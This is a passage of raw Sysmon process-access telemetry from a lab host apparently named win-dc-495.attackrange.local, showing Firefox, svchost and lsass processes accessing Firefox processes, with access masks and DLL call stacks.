10341000x800000000000000017314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.583{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.520{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla 